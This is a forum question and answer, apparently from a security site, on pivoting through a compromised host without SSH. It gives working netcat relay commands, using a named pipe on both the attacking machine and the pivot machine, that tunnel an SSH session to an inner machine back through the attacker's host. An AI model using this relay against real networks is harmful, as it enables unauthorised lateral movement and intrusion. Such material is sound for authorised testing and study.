Use netcat to Pivot

Question

So I have a shell into machine A which doesn't have ssh installed and I can't get a tty shell on (I've tried all of the tty cheat sheets, I think this is intentional)

Through machine A I can see machine B which has a ssh server running on port 2222.

What I'd like to do is either figure out how to use netcat to connect to ssh manually or use netcat to go from my attacking machine to machine A to machine B.

I first tried nc -lvp 444 -c 'nc machine.b 2222' but I can't bind to Machine A, I'm guessing firewall rules.

Next I tried forwarding the connection back to my attacking machine nc attacking.machine 444 -c 'nc machine.b 2222' which works but I realized once it's forwarded back to my attacking machine, I can't access the port to connect to it with ssh.

This is the network design... I think

Answer 1

Okay so the answer is to use a netcat relay. I found this cheat sheet from Sans that has some great nc commands on it. I also got some sage wisdom from @BetterSafteyNet which led me to the PDF. With their powers combined I came up with the series of commands below to make this work.

Using the diagram I originally posted as a legend:

First setup the listener relay on the attacking machine

~$ cd /tmp; mknod backpipe p
~$ nc -lvp <listen port 1> 0<backpipe | nc -lvp <listen port 2> | tee backpipe

Next setup the client to client relay on Machine A (the pivot machine)

~$cd /tmp; mknod backpipe p 
~$nc <machine b ip> <ssh port> 0<backpipe | nc <attack machine ip> <listening port 1> | tee backpipe   

Finally make the SSH connection from the attacking machine

~$ssh id@127.0.0.1 -p <listen port 2>